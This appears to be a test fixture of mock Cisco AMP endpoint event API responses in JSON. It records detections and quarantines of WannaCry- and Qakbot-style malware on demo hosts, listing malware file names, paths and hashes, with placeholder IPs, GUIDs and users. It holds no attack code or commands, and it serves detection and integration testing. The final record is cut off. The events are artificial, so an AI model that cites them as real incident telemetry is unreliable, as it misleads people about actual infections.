-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 